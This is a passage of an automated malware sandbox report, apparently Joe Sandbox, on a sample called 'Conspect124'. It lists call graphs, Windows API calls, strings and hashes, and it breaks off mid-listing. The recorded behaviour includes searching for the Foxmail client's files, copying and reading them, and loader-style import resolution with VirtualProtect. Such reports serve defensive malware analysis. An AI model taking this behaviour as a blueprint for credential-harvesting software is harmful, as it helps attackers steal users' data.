___scrt_fastfail 8829->8830 8831 23bc1129 lstrlenW 8830->8831 8842 23bc2c40 8831->8842 8834 23bc1168 lstrlenW 8835 23bc1177 lstrlenW FindFirstFileW 8834->8835 8836 23bc11a0 8835->8836 8837 23bc11e1 8835->8837 8838 23bc11aa 8836->8838 8839 23bc11c7 FindNextFileW 8836->8839 8837->8808 8838->8839 8844 23bc1000 8838->8844 8839->8836 8841 23bc11da FindClose 8839->8841 8841->8837 8843 23bc1148 lstrcatW lstrlenW 8842->8843 8843->8834 8843->8835 8845 23bc1022 ___scrt_fastfail 8844->8845 8846 23bc10af 8845->8846 8847 23bc102f lstrcatW lstrlenW 8845->8847 8848 23bc10b5 lstrlenW 8846->8848 8860 23bc10ad 8846->8860 8849 23bc105a lstrlenW 8847->8849 8850 23bc106b lstrlenW 8847->8850 8875 23bc1e16 8848->8875 8849->8850 8861 23bc1e89 lstrlenW 8850->8861 8853 23bc10ca 8855 23bc1e89 5 API calls 8853->8855 8853->8860 8854 23bc1088 GetFileAttributesW 8856 23bc109c 8854->8856 8854->8860 8857 23bc10df 8855->8857 8856->8860 8867 23bc173a 8856->8867 8880 23bc11ea 8857->8880 8860->8838 8862 23bc2c40 ___scrt_fastfail 8861->8862 8863 23bc1ea7 lstrcatW lstrlenW 8862->8863 8864 23bc1ed1 lstrcatW 8863->8864 8865 23bc1ec2 8863->8865 8864->8854 8865->8864 8866 23bc1ec7 lstrlenW 8865->8866 8866->8864 8868 23bc1747 ___scrt_fastfail 8867->8868 8895 23bc1cca 8868->8895 8871 23bc199f 8871->8860 8873 23bc1824 ___scrt_fastfail _strlen 8873->8871 8915 23bc15da 8873->8915 8876 23bc1e29 8875->8876 8879 23bc1e4c 8875->8879 8877 23bc1e2d lstrlenW 8876->8877 8876->8879 8878 23bc1e3f lstrlenW 8877->8878 8877->8879 8878->8879 8879->8853 8881 23bc120e ___scrt_fastfail 8880->8881 8882 23bc1e89 5 API calls 8881->8882 8883 23bc1220 GetFileAttributesW 8882->8883 8884 23bc1235 8883->8884 8885 23bc1246 8883->8885 8884->8885 8887 23bc173a 35 API calls 8884->8887 8886 23bc1e89 5 API calls 8885->8886 8888 23bc1258 8886->8888 8887->8885 8889 23bc10f1 56 API calls 8888->8889 8890 23bc126d 8889->8890 8891 23bc1e89 5 API calls 8890->8891 8892 23bc127f ___scrt_fastfail 8891->8892 8893 23bc10f1 56 API calls 8892->8893 8894 23bc12e6 8893->8894 8894->8860 8896 23bc1cf1 ___scrt_fastfail 8895->8896 8897 23bc1d0f CopyFileW CreateFileW 8896->8897 8898 23bc1d44 DeleteFileW 8897->8898 8899 23bc1d55 GetFileSize 8897->8899 8904 23bc1808 8898->8904 8900 23bc1ede 22 API calls 8899->8900 8901 23bc1d66 ReadFile 8900->8901 8902 23bc1d7d CloseHandle DeleteFileW 8901->8902 8903 23bc1d94 CloseHandle DeleteFileW 8901->8903 8902->8904 8903->8904 8904->8871 8905 23bc1ede 8904->8905 8909 23bc222f 8905->8909 8907 23bc224e 8907->8873 8909->8907 8911 23bc2250 8909->8911 8923 23bc474f 8909->8923 8928 23bc47e5 8909->8928 8910 23bc2908 8912 23bc35d2 __CxxThrowException@8 RaiseException 8910->8912 8911->8910 8935 23bc35d2 8911->8935 8913 23bc2925 8912->8913 8913->8873 8916 23bc160c _strcat _strlen 8915->8916 8917 23bc163c lstrlenW 8916->8917 9023 23bc1c9d 8917->9023 8919 23bc1655 lstrcatW lstrlenW 8920 23bc1678 8919->8920 8921 23bc167e lstrcatW 8920->8921 8922 23bc1693 ___scrt_fastfail 8920->8922 8921->8922 8922->8873 8938 23bc4793 8923->8938 8926 23bc478f 8926->8909 8927 23bc4765 8944 23bc2ada 8927->8944 8933 23bc56d0 _abort 8928->8933 8929 23bc570e 8957 23bc6368 8929->8957 8931 23bc56f9 RtlAllocateHeap 8932 23bc570c 8931->8932 8931->8933 8932->8909 8933->8929 8933->8931 8934 23bc474f _abort 7 API calls 8933->8934 8934->8933 8936 23bc35f2 RaiseException 8935->8936 8936->8910 8939 23bc479f ___scrt_is_nonwritable_in_current_image 8938->8939 8951 23bc5671 RtlEnterCriticalSection 8939->8951 8941 23bc47aa 8952 23bc47dc 8941->8952 8943 23bc47d1 _abort 8943->8927 8945 23bc2ae5 IsProcessorFeaturePresent 8944->8945 8946 23bc2ae3 8944->8946 8948 23bc2b58 8945->8948 8946->8926 8956 23bc2b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8948->8956 8950 23bc2c3b 8950->8926 8951->8941 8955 23bc56b9 RtlLeaveCriticalSection 8952->8955 8954 23bc47e3 8954->8943 8955->8954 8956->8950 8960 23bc5b7a GetLastError 8957->8960 8961 23bc5b99 8960->8961 8962 23bc5b93 8960->8962 8966 23bc5bf0 SetLastError 8961->8966 8986 23bc637b 8961->8986 8979 23bc5e08 8962->8979 8968 23bc5bf9 8966->8968 8967 23bc5bb3 8993 23bc571e 8967->8993 8968->8932 8972 23bc5bcf 9006 23bc593c 8972->9006 8973 23bc5bb9 8975 23bc5be7 SetLastError 8973->8975 8975->8968 8977 23bc571e _free 17 API calls 8978 23bc5be0 8977->8978 8978->8966 8978->8975 9011 23bc5c45 8979->9011 8981 23bc5e2f 8982 23bc5e47 TlsGetValue 8981->8982 8983 23bc5e3b 8981->8983 8982->8983 8984 23bc2ada _ValidateLocalCookies 5 API calls 8983->8984 8985 23bc5e58 8984->8985 8985->8961 8992 23bc6388 _abort 8986->8992 8987 23bc63c8 8990 23bc6368 _free 19 API calls 8987->8990 8988 23bc63b3 RtlAllocateHeap 8989 23bc5bab 8988->8989 8988->8992 8989->8967 8999 23bc5e5e 8989->8999 8990->8989 8991 23bc474f _abort 7 API calls 8991->8992 8992->8987 8992->8988 8992->8991 8994 23bc5729 HeapFree 8993->8994 8995 23bc5752 _free 8993->8995 8994->8995 8996 23bc573e 8994->8996 8995->8973 8997 23bc6368 _free 18 API calls 8996->8997 8998 23bc5744 GetLastError 8997->8998 8998->8995 9000 23bc5c45 _abort 5 API calls 8999->9000 9001 23bc5e85 9000->9001 9002 23bc5ea0 TlsSetValue 9001->9002 9003 23bc5e94 9001->9003 9002->9003 9004 23bc2ada _ValidateLocalCookies 5 API calls 9003->9004 9005 23bc5bc8 9004->9005 9005->8967 9005->8972 9017 23bc5914 9006->9017 9015 23bc5c71 9011->9015 9016 23bc5c75 __crt_fast_encode_pointer 9011->9016 9012 23bc5c95 9014 23bc5ca1 GetProcAddress 9012->9014 9012->9016 9013 23bc5ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 9013->9015 9014->9016 9015->9012 9015->9013 9015->9016 9016->8981 9018 23bc5854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 9017->9018 9019 23bc5938 9018->9019 9020 23bc58c4 9019->9020 9021 23bc5758 _abort 20 API calls 9020->9021 9022 23bc58e8 9021->9022 9022->8977 9024 23bc1ca6 _strlen 9023->9024 9024->8919

                                      Executed Functions

                                      Function 23BC10F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 23BC1137
                                      • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 23BC1151
                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 23BC115C
                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 23BC116D
                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 23BC117C
                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 23BC1193
                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 23BC11D0
                                      • FindClose.KERNEL32(00000000), ref: 23BC11DB
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                      • String ID:
                                      • API String ID: 1083526818-0
                                      • Opcode ID: 10dcb6e0d13499153fb75e155b98a31314c135e9cf815a2f05fe8123e3fbc537
                                      • Instruction ID: bef8c72193e8b072179cd697df636e554be70483b319d559d37a61832835bf23
                                      • Opcode Fuzzy Hash: 10dcb6e0d13499153fb75e155b98a31314c135e9cf815a2f05fe8123e3fbc537
                                      • Instruction Fuzzy Hash: 5D216F72A043486FDB30EE649C48F9B7B9CEF98714F040D6ABA98D3190EB74D6058796
                                      Function 23BC12EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 23BC1434
                                        • Part of subcall function 23BC10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 23BC1137
                                        • Part of subcall function 23BC10F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 23BC1151
                                        • Part of subcall function 23BC10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 23BC115C
                                        • Part of subcall function 23BC10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 23BC116D
                                        • Part of subcall function 23BC10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 23BC117C
                                        • Part of subcall function 23BC10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 23BC1193
                                        • Part of subcall function 23BC10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 23BC11D0
                                        • Part of subcall function 23BC10F1: FindClose.KERNEL32(00000000), ref: 23BC11DB
                                      • lstrlenW.KERNEL32(?), ref: 23BC14C5
                                      • lstrlenW.KERNEL32(?), ref: 23BC14E0
                                      • lstrlenW.KERNEL32(?,?), ref: 23BC150F
                                      • lstrcatW.KERNEL32(00000000), ref: 23BC1521
                                      • lstrlenW.KERNEL32(?,?), ref: 23BC1547
                                      • lstrcatW.KERNEL32(00000000), ref: 23BC1553
                                      • lstrlenW.KERNEL32(?,?), ref: 23BC1579
                                      • lstrcatW.KERNEL32(00000000), ref: 23BC1585
                                      • lstrlenW.KERNEL32(?,?), ref: 23BC15AB
                                      • lstrcatW.KERNEL32(00000000), ref: 23BC15B7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                      • String ID: )$Foxmail$ProgramFiles
                                      • API String ID: 672098462-2938083778
                                      • Opcode ID: 6fb095b93afe57c6d8f793a0364f9a724d699982dff4795be4c57d2a5f7f5b3c
                                      • Instruction ID: c8c1b675a90d1e2cf4d0f6e0dbd0e0c50b4ea4f2915535afc287d2b7d7c9b22b
                                      • Opcode Fuzzy Hash: 6fb095b93afe57c6d8f793a0364f9a724d699982dff4795be4c57d2a5f7f5b3c
                                      • Instruction Fuzzy Hash: 7D819471A4035CAEDB30DBA19C85FEF7379EF88700F0009E6E508E7191EA715A85CB95
                                      Function 23BCC7E6 Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetModuleHandleA.KERNEL32(23BCC7DD), ref: 23BCC7E6
                                      • GetModuleHandleA.KERNEL32(?,23BCC7DD), ref: 23BCC838
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 23BCC860
                                        • Part of subcall function 23BCC803: GetProcAddress.KERNEL32(00000000,23BCC7F4), ref: 23BCC804
                                        • Part of subcall function 23BCC803: VirtualProtect.KERNEL32(?,00000078,?,?,00000000,00000000,23BCC7F4,23BCC7DD), ref: 23BCC816
                                        • Part of subcall function 23BCC803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,23BCC7F4,23BCC7DD), ref: 23BCC82A
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProcProtectVirtual
                                      • String ID:
                                      • API String ID: 2099061454-0
                                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                      • Instruction ID: bdb129dfbca63a016b1d5ef881ecd1667fd13fc97533424dc700060becc87243
                                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                      • Instruction Fuzzy Hash: 8201C0009453C16DAA31EE740C01ABB5F98FB3B663B181EF6A250C61B3D9A0850783AA
                                      Function 23BCC7A7 Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 79 23bcc7a7-23bcc7bc 80 23bcc82d 79->80 81 23bcc7be-23bcc7c6 79->81 82 23bcc82f-23bcc833 80->82 81->80 83 23bcc7c8-23bcc7f6 call 23bcc7e6 81->83 84 23bcc835-23bcc83d GetModuleHandleA 82->84 85 23bcc872 call 23bcc877 82->85 90 23bcc86c-23bcc86e 83->90 91 23bcc7f8 83->91 88 23bcc83f-23bcc847 84->88 88->88 92 23bcc849-23bcc84c 88->92 95 23bcc866-23bcc86b 90->95 96 23bcc870 90->96 93 23bcc7fa-23bcc7fe 91->93 94 23bcc85b-23bcc85e 91->94 92->82 97 23bcc84e-23bcc850 92->97 102 23bcc865 93->102 103 23bcc800-23bcc80b GetProcAddress 93->103 98 23bcc85f-23bcc860 GetProcAddress 94->98 95->90 96->92 100 23bcc856-23bcc85a 97->100 101 23bcc852-23bcc854 97->101 98->102 100->94 101->98 102->95 103->80 104 23bcc80d-23bcc81a VirtualProtect 103->104 105 23bcc82c 104->105 106 23bcc81c-23bcc82a VirtualProtect 104->106 105->80 106->105
                                      APIs
                                      • GetModuleHandleA.KERNEL32(?,23BCC7DD), ref: 23BCC838
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 23BCC860
                                        • Part of subcall function 23BCC7E6: GetModuleHandleA.KERNEL32(23BCC7DD), ref: 23BCC7E6
                                        • Part of subcall function 23BCC7E6: GetProcAddress.KERNEL32(00000000,23BCC7F4), ref: 23BCC804
                                        • Part of subcall function 23BCC7E6: VirtualProtect.KERNEL32(?,00000078,?,?,00000000,00000000,23BCC7F4,23BCC7DD), ref: 23BCC816
                                        • Part of subcall function 23BCC7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,23BCC7F4,23BCC7DD), ref: 23BCC82A
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProcProtectVirtual
                                      • String ID:
                                      • API String ID: 2099061454-0
                                      • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                      • Instruction ID: 32b3e0493692dbe4286d1abf0834aeea3e44a2de6c3c240e036289eb068c6ba5
                                      • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                      • Instruction Fuzzy Hash: 0021B1614482C16EEB31DE744C04AB76FD8EB37262F1D0EE6D140CB173D5A8894783A6
                                      Function 23BCC803 Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 107 23bcc803-23bcc80b GetProcAddress 108 23bcc82d 107->108 109 23bcc80d-23bcc81a VirtualProtect 107->109 112 23bcc82f-23bcc833 108->112 110 23bcc82c 109->110 111 23bcc81c-23bcc82a VirtualProtect 109->111 110->108 111->110 113 23bcc835-23bcc83d GetModuleHandleA 112->113 114 23bcc872 call 23bcc877 112->114 116 23bcc83f-23bcc847 113->116 116->116 117 23bcc849-23bcc84c 116->117 117->112 118 23bcc84e-23bcc850 117->118 119 23bcc856-23bcc85e 118->119 120 23bcc852-23bcc854 118->120 121 23bcc85f-23bcc865 GetProcAddress 119->121 120->121 124 23bcc866-23bcc86e 121->124 126 23bcc870 124->126 126->117
                                      APIs
                                      • GetProcAddress.KERNEL32(00000000,23BCC7F4), ref: 23BCC804
                                      • VirtualProtect.KERNEL32(?,00000078,?,?,00000000,00000000,23BCC7F4,23BCC7DD), ref: 23BCC816
                                      • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,23BCC7F4,23BCC7DD), ref: 23BCC82A
                                      • GetModuleHandleA.KERNEL32(?,23BCC7DD), ref: 23BCC838
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 23BCC860
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: AddressProcProtectVirtual$HandleModule
                                      • String ID:
                                      • API String ID: 2152742572-0
                                      • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                      • Instruction ID: 3fe1064b2314cb1e33b0b37542a1c881f0b21ced78b4c87074ce2f0d4e3141b4
                                      • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                      • Instruction Fuzzy Hash: BDF08C415853C06DFA31EDB41C41AB75B8CEA3B663B181EF6A210C71B3D895850783BA

                                      Non-executed Functions

                                      Function 0040333D Relevance: 75.7, APIs: 33, Strings: 10, Instructions: 412stringfilecomCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 136 40333d-40337a SetErrorMode GetVersion 137 40337c-403384 call 406626 136->137 138 40338d 136->138 137->138 144 403386 137->144 139 403392-4033a6 call 4065b6 lstrlenA 138->139 145 4033a8-4033c4 call 406626 * 3 139->145 144->138 152 4033d5-403436 #17 OleInitialize SHGetFileInfoW call 40624c GetCommandLineW call 40624c GetModuleHandleW 145->152 153 4033c6-4033cc 145->153 160 403440-40345a call 405b4a CharNextW 152->160 161 403438-40343f 152->161 153->152 158 4033ce 153->158 158->152 164 403460-403466 160->164 165 403571-40358b GetTempPathW call 40330c 160->165 161->160 167 403468-40346d 164->167 168 40346f-403473 164->168 172 4035e3-4035fd DeleteFileW call 402ec1 165->172 173 40358d-4035ab GetWindowsDirectoryW lstrcatW call 40330c 165->173 167->167 167->168 170 403475-403479 168->170 171 40347a-40347e 168->171 170->171 174 403484-40348a 171->174 175 40353d-40354a call 405b4a 171->175 193 403603-403609 172->193 194 4036ae-4036be call 403880 OleUninitialize 172->194 173->172 190 4035ad-4035dd GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40330c 173->190 179 4034a5-4034de 174->179 180 40348c-403494 174->180 191 40354c-40354d 175->191 192 40354e-403554 175->192 183 4034e0-4034e5 179->183 184 4034fb-403535 179->184 181 403496-403499 180->181 182 40349b 180->182 181->179 181->182 182->179 183->184 188 4034e7-4034ef 183->188 184->175 189 403537-40353b 184->189 196 4034f1-4034f4 188->196 197 4034f6 188->197 189->175 198 40355c-40356a call 40624c 189->198 190->172 190->194 191->192 192->164 200 40355a 192->200 201 40369e-4036aa call 40395a 193->201 202 40360f-40361a call 405b4a 193->202 211 4037e4-4037ea 194->211 212 4036c4-4036d4 call 4058ae ExitProcess 194->212 196->184 196->197 197->184 208 40356f 198->208 200->208 201->194 213 403668-403672 202->213 214 40361c-403651 202->214 208->165 216 403868-403870 211->216 217 4037ec-403802 GetCurrentProcess OpenProcessToken 211->217 221 403674-403682 call 405c25 213->221 222 4036da-4036ee call 405819 lstrcatW 213->222 218 403653-403657 214->218 219 403872 216->219 220 403876-40387a ExitProcess 216->220 224 403804-403832 LookupPrivilegeValueW AdjustTokenPrivileges 217->224 225 403838-403846 call 406626 217->225 226 403660-403664 218->226 227 403659-40365e 218->227 219->220 221->194 237 403684-40369a call 40624c * 2 221->237 238 4036f0-4036f6 lstrcatW 222->238 239 4036fb-403715 lstrcatW lstrcmpiW 222->239 224->225 235 403854-40385f ExitWindowsEx 225->235 236 403848-403852 225->236 226->218 231 403666 226->231 227->226 227->231 231->213 235->216 240 403861-403863 call 40140b 235->240 236->235 236->240 237->201 238->239 239->194 242 403717-40371a 239->242 240->216 246 403723 call 4057fc 242->246 247 40371c-403721 call 40577f 242->247 252 403728-403736 SetCurrentDirectoryW 246->252 247->252 254 403743-40376c call 40624c 252->254 255 403738-40373e call 40624c 252->255 259 403771-40378d call 40626e DeleteFileW 254->259 255->254 262 4037ce-4037d6 259->262 263 40378f-40379f CopyFileW 259->263 262->259 264 4037d8-4037df call 406012 262->264 263->262 265 4037a1-4037c1 call 406012 call 40626e call 405831 263->265 264->194 265->262 274 4037c3-4037ca CloseHandle 265->274 274->262
                                      APIs
                                      • SetErrorMode.KERNEL32 ref: 00403360
                                      • GetVersion.KERNEL32 ref: 00403366
                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403399
                                      • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033D6
                                      • OleInitialize.OLE32(00000000), ref: 004033DD
                                      • SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 004033F9
                                      • GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040340E
                                      • GetModuleHandleW.KERNEL32(00000000,00435000,00000000,?,00000006,00000008,0000000A), ref: 00403421
                                      • CharNextW.USER32(00000000,00435000,00000020,?,00000006,00000008,0000000A), ref: 00403448
                                        • Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                        • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                      • GetTempPathW.KERNEL32(00000400,00437800,?,00000006,00000008,0000000A), ref: 00403582
                                      • GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,00000006,00000008,0000000A), ref: 00403593
                                      • lstrcatW.KERNEL32(00437800,\Temp,?,00000006,00000008,0000000A), ref: 0040359F
                                      • GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp,?,00000006,00000008,0000000A), ref: 004035B3
                                      • lstrcatW.KERNEL32(00437800,Low,?,00000006,00000008,0000000A), ref: 004035BB
                                      • SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,00000006,00000008,0000000A), ref: 004035CC
                                      • SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,00000006,00000008,0000000A), ref: 004035D4
                                      • DeleteFileW.KERNEL32(00437000,?,00000006,00000008,0000000A), ref: 004035E8
                                        • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                                      • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036B3
                                      • ExitProcess.KERNEL32 ref: 004036D4
                                      • lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 004036E7
                                      • lstrcatW.KERNEL32(00437800,0040A26C,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 004036F6
                                      • lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403701
                                      • lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040370D
                                      • SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,00000006,00000008,0000000A), ref: 00403729
                                      • DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 00403783
                                      • CopyFileW.KERNEL32(00438800,00420EA8,?,?,00000006,00000008,0000000A), ref: 00403797
                                      • CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,00000006,00000008,0000000A), ref: 004037C4
                                      • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 004037F3
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 004037FA
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040380F
                                      • AdjustTokenPrivileges.ADVAPI32 ref: 00403832
                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403857
                                      • ExitProcess.KERNEL32 ref: 0040387A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                      • String ID: .tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                      • API String ID: 2488574733-3195845224
                                      • Opcode ID: f6fbf25430e21501bb68e7fd8701bad57b8adefdd86ce7047aeb7cb0d2a7cc6d
                                      • Instruction ID: 8796dd7fda2277e74c31c2c32d36de8c434ed5469641edba7c3d6f01ab9f589a
                                      • Opcode Fuzzy Hash: f6fbf25430e21501bb68e7fd8701bad57b8adefdd86ce7047aeb7cb0d2a7cc6d
                                      • Instruction Fuzzy Hash: 8AD11470600310ABD7207F759D45B2B3AACEB4074AF10447EF881B62D1DB7E8956CB6E
                                      Function 00404C2C Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 326 404c2c-404c78 GetDlgItem * 2 327 404e99-404ea0 326->327 328 404c7e-404d12 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 326->328 329 404ea2-404eb2 327->329 330 404eb4 327->330 331 404d21-404d28 DeleteObject 328->331 332 404d14-404d1f SendMessageW 328->332 333 404eb7-404ec0 329->333 330->333 334 404d2a-404d32 331->334 332->331 335 404ec2-404ec5 333->335 336 404ecb-404ed1 333->336 337 404d34-404d37 334->337 338 404d5b-404d5f 334->338 335->336 342 404faf-404fb6 335->342 339 404ee0-404ee7 336->339 340 404ed3-404eda 336->340 343 404d39 337->343 344 404d3c-404d59 call 40626e SendMessageW * 2 337->344 338->334 341 404d61-404d8d call 4041e1 * 2 338->341 346 404ee9-404eec 339->346 347 404f5c-404f5f 339->347 340->339 340->342 382 404d93-404d99 341->382 383 404e58-404e6b GetWindowLongW SetWindowLongW 341->383 349 405027-40502f 342->349 350 404fb8-404fbe 342->350 343->344 344->338 355 404ef7-404f0c call 404b7a 346->355 356 404eee-404ef5 346->356 347->342 351 404f61-404f6b 347->351 353 405031-405037 